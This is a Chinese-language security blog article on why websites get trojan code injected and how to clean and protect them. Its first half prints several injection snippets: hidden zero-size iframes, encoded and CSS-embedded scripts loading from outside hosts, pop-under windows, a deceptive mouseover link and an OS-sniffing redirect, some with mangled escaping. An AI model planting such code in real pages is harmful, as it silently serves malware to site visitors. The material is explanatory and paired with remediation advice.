网站为什么会被挂木马？网站被挂木马怎么解决？

作者：

发布时间：2020-07-09

　　随着互联网的规模越来越庞大，网站的数量也是越来越多，特别是不少企业的业务都离不开网站的支撑，因而导致众多黑客的目标也都以网站为主。根据不完全统计，目前的网站有超过80%以上都有被挂木马的经历，那么网站为什么会被挂木马?网站被挂木马怎么解决?我们来了解一下吧。

网站为什么会被挂木马

　　网站为什么会被挂木马?网站被挂马最常见的方式都是黑客通过系统漏洞或者服务器配置上的漏洞，获取网站或者网站服务器的部分权限或者全部权限，在网站的源文件中插入一段恶意代码，导致用户在访问页面的时候自动执行恶意代码，进而令用户和企业蒙受损失。

　　这里列举一下网站被挂木马的一些常见的方式：

一:框架挂马

二:js文件挂马首先将以下代码

document.write("<iframe width='0' height='0' src='地址'></iframe>");保存为xxx.js，则JS挂马代码为<script language=javascript src=xxx.js></script>

三:js变形加密

<SCRIPT language="JScript.Encode" src=http://www.upx.com.cn/muma.txt></script>muma.txt

可改成任意后缀

四:body挂马

五:隐蔽挂马

top.document.body.innerHTML = top.document.body.innerHTML + '/r/n<iframe
src="http://www.xxx.com.cn/muma.htm/"></iframe>';

六:css中挂马

body {
background-image: url('javascript:document.write("<script
src=http://www.upx.com.cn/muma.js></script>")')}

七:JAJA挂马

<SCRIPT language=javascript>
window.open ("地址","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro
llbars=no,width=1,height=1");
</script>

八:图片伪装

九:伪装调用

十:高级欺骗

<a href="http://www.xxx.com(迷惑连接地址，显示这个地址指向木马地址)" onMouseOver="www_163_com();
return true;"> 页面要显示的内容 </a>
<SCRIPT Language="JavaScript">
function www_163_com ()
{
var url="网马地址";
open
(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizabl
e=no,copyhistory=yes,width=800,height=600,left=10,top=10");
}
</SCRIPT>

十一:判断系统代码

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD><TITLE>404</TITLE>
<META http-equiv=Content-Type content="text/html; charset=windows-1252">
<META content="MSHTML 6.00.2900.2769" name=GENERATOR></HEAD>
<BODY>
<SCRIPT language=javascript>
window.status="";
if(navigator.userAgent.indexOf("Windows NT 5.1") != -1)
window.location.href="tk.htm";
else
window.location.href="upx06014.htm";
</SCRIPT>
</BODY></HTML>

十二:判断是否有ms06014代码

十三:智能读取js的代码demo

//读娶src的对象
var v = document.getElementById("advjs");
//读娶src的参数
var u_num = getUrlParameterAdv("showmatrix_num",v.getAttribute('src'));
document.write("<iframe src=/"http://www.xxx.com.cn/1/"+u_num+".htm/" width=/"0/" height=/"0/"
frameborder=/"0/"></iframe>");
document.writeln("<!DOCTYPE HTML PUBLIC /"-////W3C////DTD HTML 4.0 Transitional////EN/">");
document.writeln("<HTML><HEAD>");
document.writeln("<META http-equiv=Content-Type content=/"text//html; charset=big5/">");
document.writeln("<META content=/"MSHTML 6.00.2900.3059/" name=GENERATOR><//HEAD>");
document.writeln("<BODY> ");
document.writeln("<DIV style=/"CURSOR: url(/'http:////www.upx.com.cn//demo.js/')/">");
document.writeln("<DIV ");
document.writeln("style=/"CURSOR: url(/'http:////www.upx.com.cn//demo.js/')/"><//DIV><//DIV><
//BODY><//HTML>")
//分析src的参数函数
function getUrlParameterAdv(asName,lsURL){
loU = lsURL.split("?");
if (loU.length>1){
var loallPm = loU[1].split("&");
for (var i=0; i<loallPm.length; i++){
var loPm = loallPm.split("=");
if (loPm[0]==asName){
if (loPm.length>1){
return loPm[1];
}else{
return "";
}
}
}
}
return null;
}

网站被挂木马怎么解决

　　1)最直接的方式：如果是简单的挂黑链和添加页面，那么直接删除，把权重设置一下如果是全设置很多，这样建议关闭网站，

　　百度统计后台有关闭网站的功能，可以直接选择关闭，但这个处理方式最不建议使用。

　　2)最彻底的方式：启用网站备份文件，在网站被黑之前，我就要对相应的数据库和文件进行备份，这样能更好的保证网站安全，

　　同时网站在被黑的情况下也能很快恢复网站的运营，这个是最常见的处理方式。

　　3)要及时提交死链给百度等主要搜索引擎，推荐在一个404 TXT列出所有死链，然后上传FTP根目录下，把地址提交给百度即可，

　　没有404页面的一定要设置404页面，千万不要忽略了。

　　4)robots 文件的设置，把删除死链的相关文件设置不允许抓取就行了。

　　5)坚持一段时间的高质量内容更新和适当的外链发布。

　　6)更换一下系统管理员密码，设置复杂点，然后网站的程序该升级的进行升级，特别是cms程序，如织梦程序。

　　7)定期对网站进行安全检测：1,日志检查 2,网站收录检查 3,网站文件检查。一般通过文件修改时间来判断。定期做好网站安全检测，这样才能及时发现并解决问题，从而有效减低损失。

　　8)设置好目录和文件权限，定期更新和升级网站程序。如果还是被反复篡改建议找专业的安全公司来处理，比如安全狗。

网站为什么会被挂木马？网站被挂木马怎么解决？

　　通过上面关于网站为什么会被挂木马以及网站被挂木马怎么解决的讲解，大家应该都知道如果网站被挂木马了应该怎么查找和解决了吧。网站被挂木马的最根本原因就是平时为维护服务器的时候没有重视安全防护，比如漏洞的修复，配置上的疏忽等等原因，导致黑客有机可趁。因此在日常维护服务器的时候，一定要做好全面防护工作，一旦被挂木马，要全面清理还是挺麻烦的。

标签：

上一篇： web安全测试方案

下一篇：网站被木马攻击怎么办？怎么删除网站木马文件？

最新资讯: 企业级网络防火墙可以防护哪些方面?; 企业网络等保测评必须要做吗-企业网络等保测评的必要性分析; 云安全环境加固需要哪些措施？; 网络安全隔离设备有哪些; 网站被挂马怎么解决; web应用防火墙怎么部署?; 网络安全审计系统有哪些功能?多少钱?; 服务器卡顿动不了怎么解决; 网站中木马被反复篡改的彻底修复方法; 服务器被篡改登录不上怎么办？

相关资讯